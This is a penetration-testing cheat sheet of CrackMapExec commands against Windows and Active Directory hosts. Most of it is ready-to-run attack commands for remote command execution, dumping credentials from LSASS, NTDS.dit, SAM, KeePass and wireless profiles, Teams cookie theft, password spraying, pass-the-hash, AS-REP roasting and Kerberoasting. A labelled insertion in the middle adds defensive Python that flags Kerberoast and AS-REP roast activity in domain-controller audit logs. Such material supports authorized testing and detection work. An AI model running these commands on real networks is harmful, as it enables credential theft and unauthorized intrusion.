CrackMapExec notes

A lot of this was pulled from the Wayback Machine archive of what used to be crackmapexec.wiki, but the original site seems to be down now. This should be a comprehensive list of general commands that can be used with CrackMapExec.

Basic command execution stuff

What protocol is this?


crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'

SMB stuff

dump creds

Note that for a lot of these, you need local admin, just like with Mimikatz.

LSASS


cme smb 192.168.255.131 -u administrator -p pass -M lsassy
cme smb 192.168.255.131 -u administrator -p pass -M nanodump

Wireless

cme smb <ip> -u user -p pass -M wireless

KeePass


$ crackmapexec smb <ip> -u user -p pass -M keepass_discover
$ crackmapexec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

NTDS.dit


#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss

Note: you can also get the NTDS.dit contents by DCSyncing with the DC machine account.

SAM hashes


cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam

MS Teams cookie theft (need local admin)


$ crackmapexec smb <ip> -u user -p pass -M teams_localdb

SMB password sprays

#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt

Local authentication examples

#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth

LDAP

test acct existence using LDAP no kerb


#~ cme ldap 192.168.1.0/24 -u users.txt -p '' -k

testing creds


#~ cme ldap 192.168.1.0/24 -u user -p password

with hash


#~ cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B

ASREP Roast


cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt

Domain SID Discovery


$ crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid

Kerberoast


cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
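The defender's view of the AS-REP roast and Kerberoast commands above, as an added example that is not from the original notes or from the CrackMapExec project. It runs over a constructed set of domain-controller audit records (event 4769, service ticket requests, and event 4768, TGT requests) flattened to key=value lines; the field names and sample values are assumptions for the example. A Kerberoast run shows up as one client requesting RC4 (encryption type 0x17) service tickets for many non-machine service accounts; an AS-REP roast shows up as a 4768 record whose pre-authentication type is 0.

```python
from collections import defaultdict

# Constructed sample of DC audit records (NOT real log data). Field names are
# assumptions for this example: id = event ID, client = requesting IP,
# account = requesting principal, service = ticket target (4769 only),
# enc = ticket encryption type, preauth = pre-authentication type (4768 only).
SAMPLE_EVENTS = """\
id=4769 client=10.0.0.50 account=harry@CORP.LOCAL service=sqlsvc enc=0x17
id=4769 client=10.0.0.50 account=harry@CORP.LOCAL service=http_svc enc=0x17
id=4769 client=10.0.0.50 account=harry@CORP.LOCAL service=backup_svc enc=0x17
id=4769 client=10.0.0.50 account=harry@CORP.LOCAL service=WS01$ enc=0x12
id=4769 client=10.0.0.9 account=alice@CORP.LOCAL service=fileserver$ enc=0x12
id=4768 client=10.0.0.50 account=harry@CORP.LOCAL preauth=2 enc=0x12
id=4768 client=10.0.0.50 account=svc_old@CORP.LOCAL preauth=0 enc=0x17
"""


def parse_events(text):
    """Turn key=value lines into dicts, skipping blank lines."""
    return [dict(kv.split("=", 1) for kv in line.split())
            for line in text.splitlines() if line.strip()]


def kerberoast_suspects(events, min_services=3):
    """Per client IP, collect distinct non-machine service names requested with
    RC4 (0x17) service tickets. Machine accounts (trailing '$') are ignored
    because their keys are random and not worth cracking. Returns
    {client: sorted services} for clients at or above `min_services`."""
    per_client = defaultdict(set)
    for ev in events:
        if (ev["id"] == "4769" and ev["enc"] == "0x17"
                and not ev["service"].endswith("$")):
            per_client[ev["client"]].add(ev["service"])
    return {c: sorted(s) for c, s in per_client.items() if len(s) >= min_services}


def asrep_suspects(events):
    """Return sorted (client, account) pairs for TGT requests (4768) that were
    granted without pre-authentication (preauth type 0), i.e. accounts whose
    AS-REP can be taken offline for cracking."""
    return sorted((ev["client"], ev["account"]) for ev in events
                  if ev["id"] == "4768" and ev["preauth"] == "0")


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for client, services in kerberoast_suspects(events).items():
        print(f"possible Kerberoast from {client}: {services}")
    for client, account in asrep_suspects(events):
        print(f"AS-REP without pre-auth for {account} requested by {client}")
```

The AS-REP check is really an inventory check: any account that produces a preauth=0 record has "Do not require Kerberos preauthentication" set, and removing that flag (or giving the account a long random password) is the fix regardless of who requested the ticket. The Kerberoast threshold is a starting point; tune `min_services` to how many RC4 service-ticket requests a normal client makes in your environment.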

Bloodhound ingestion


crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

WINRM stuff

passwd spray


#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

test creds


#~ cme winrm 192.168.1.0/24 -u user -p password

if SMB is closed


#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN

Command execution


#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami

WMI

Password Spray


#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile
#~ cme wmi 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce

test creds


#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'

Test creds if no SMB


#~ cme wmi 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d <domain>

Local auth


#~ cme wmi 10.10.10.52 -u admin -p 'admin' --local-auth

WMI command execution


#~ crackmapexec wmi 192.168.255.131 -u user -p 'password' -x whoami